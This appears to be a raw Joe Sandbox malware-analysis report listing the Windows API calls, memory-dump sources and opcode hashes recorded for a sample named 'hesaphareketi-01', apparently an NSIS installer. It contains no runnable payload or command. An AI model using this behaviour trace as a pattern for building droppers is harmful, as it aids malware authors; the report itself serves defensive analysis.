                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCreate
                                                                                      • String ID:
                                                                                      • API String ID: 415043291-0
                                                                                      • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                      • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                      • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                      • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403366,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75383420,004035BF,?,00000006,00000008,0000000A), ref: 00405838
                                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405846
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1375471231-0
                                                                                      • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                      • Instruction ID: 034de6f099216337e7681325378c15a49c0ca39433587e883605b7c80b1fabea
                                                                                      • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                      • Instruction Fuzzy Hash: C8C08C312155019AC7002F219F08B0B3A50AB20340F018439A946E00E0DA308424DD2D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileMove
                                                                                      • String ID:
                                                                                      • API String ID: 3562171763-0
                                                                                      • Opcode ID: 00950383e2418b758ba5d5ef96d8c906d56e3cb6ea615abdf22e42107666f064
                                                                                      • Instruction ID: a1293fda71315ca4f457bf12d72103a8cc789f689a624f6d3393c8ddcf995e9b
                                                                                      • Opcode Fuzzy Hash: 00950383e2418b758ba5d5ef96d8c906d56e3cb6ea615abdf22e42107666f064
                                                                                      • Instruction Fuzzy Hash: 06F0B431608114A7DB20B7B54F0DE9F61A48F92378F25073FB011B21D1EABC8911956F
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringWrite
                                                                                      • String ID:
                                                                                      • API String ID: 390214022-0
                                                                                      • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                                      • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                                                      • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                                      • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406146
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                      • Instruction ID: 190238b8cd19dd4efab6c9cc8903e135eae53195524c7f3a74b1c4143961a507
                                                                                      • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                      • Instruction Fuzzy Hash: A1E0E6B2010109BEDF095F50DD0AD7B371DEB04704F01452EFA57D5091E6B5A9309679
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: PathSearch
                                                                                      • String ID:
                                                                                      • API String ID: 2203818243-0
                                                                                      • Opcode ID: 87fe3b61629f5e0ebd9fc8bdc6ab881a16aedefde4f24a351ebdfdeb992b7138
                                                                                      • Instruction ID: c536573bc3e43d5b3a7e85c7c9e9d28b189a23ca24d66c16325d62ee7f8c4f5c
                                                                                      • Opcode Fuzzy Hash: 87fe3b61629f5e0ebd9fc8bdc6ab881a16aedefde4f24a351ebdfdeb992b7138
                                                                                      • Instruction Fuzzy Hash: 42E04FB2704204AAE710DBA4DE49AAA77A8DF40368B20853AB211E61C1E6B49941976D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032DE,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E3A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                      • Instruction ID: 087a0ba252b1651b23da729bb4e18d02a4b8a10c1fd3406c9ee2a7e33144c981
                                                                                      • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                      • Instruction Fuzzy Hash: 96E0463221021AABCF10AF50CC04AAB3B6CFB003A0F004432B955E2050D230EA208AE9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403328,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405E0B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                      • Instruction ID: e221de633d5b74da9fce23a9c995dc3304d5126a795d503f9c3389b6b2e666c2
                                                                                      • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                      • Instruction Fuzzy Hash: 4DE0EC3221025AABDF10AF95DC00EEB7B6CEB05360F044436FA65E7150D631EA619BF8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1296135375.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1296082839.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.1296189107.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.1296242418.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                      • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                                                      • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                      • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileString
                                                                                      • String ID:
                                                                                      • API String ID: 1096422788-0
                                                                                      • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                                      • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                                                                      • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                                      • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617D,?,00000000,?,?,Call,?), ref: 00406113
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                      • Instruction ID: 3f4f51c5761301f24834a255f16e5381e59d2a113ab40b24d84d285923e9a67b
                                                                                      • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                      • Instruction Fuzzy Hash: 47D0173604020DBBEF119F90ED01FAB3B6DAB08314F014826FE16A80A2D776D530AB68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SendMessageW.USER32(0001046E,00000000,00000000,00000000), ref: 00404275
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
                                                                                      • Instruction ID: 095d2356c3d82f38ec3eb680651803a72dc2fc2a091610a0eb944f64c2fac8e0
                                                                                      • Opcode Fuzzy Hash: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
                                                                                      • Instruction Fuzzy Hash: 5CC09B717443007BDE118F609D85F0777546790741F14447D7344F51E0C774E450D61C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403339
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ShellExecuteExW.SHELL32(?), ref: 004058B9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExecuteShell
                                                                                      • String ID:
                                                                                      • API String ID: 587946157-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00404010), ref: 00404243
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 004052E6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000000,0041C000,753823A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                                        • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000000,0041C000,753823A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                                        • Part of subcall function 004052E6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,0040325E), ref: 00405341
                                                                                        • Part of subcall function 004052E6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll), ref: 00405353
                                                                                        • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                                        • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                                        • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                                        • Part of subcall function 00405867: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                                                        • Part of subcall function 00405867: CloseHandle.KERNEL32(?), ref: 0040589D
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                                                        • Part of subcall function 0040670D: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040671E
                                                                                        • Part of subcall function 0040670D: GetExitCodeProcess.KERNEL32(?,?), ref: 00406740
                                                                                        • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2972824698-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1296135375.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1296082839.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.1296189107.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.1296242418.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocGlobal
                                                                                      • String ID:
                                                                                      • API String ID: 3761449716-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040492E
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404949
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: DiskFreeSpace
                                                                                      • String ID: ,Dw
                                                                                      • API String ID: 1705453755-2489452552
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: p!C$p!C
                                                                                      • API String ID: 0-3125587631
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404452
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404466
                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404483
                                                                                      • GetSysColor.USER32(?), ref: 00404494
                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A2
                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B0
                                                                                      • lstrlenW.KERNEL32(?), ref: 004044B5
                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C2
                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044D7
                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404530
                                                                                      • SendMessageW.USER32(00000000), ref: 00404537
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404562
                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045A5
                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004045B3
                                                                                      • SetCursor.USER32(00000000), ref: 004045B6
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004045CF
                                                                                      • SetCursor.USER32(00000000), ref: 004045D2
                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404601
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404613
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                      • String ID: +C@$,Dw$Call$N
                                                                                      • API String ID: 3103080414-1674668432
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406069,?,?), ref: 00405F09
                                                                                      • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F12
                                                                                        • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                                                        • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                                                      • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F2F
                                                                                      • wsprintfA.USER32 ref: 00405F4D
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405F88
                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F97
                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                                                      • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406025
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406036
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603D
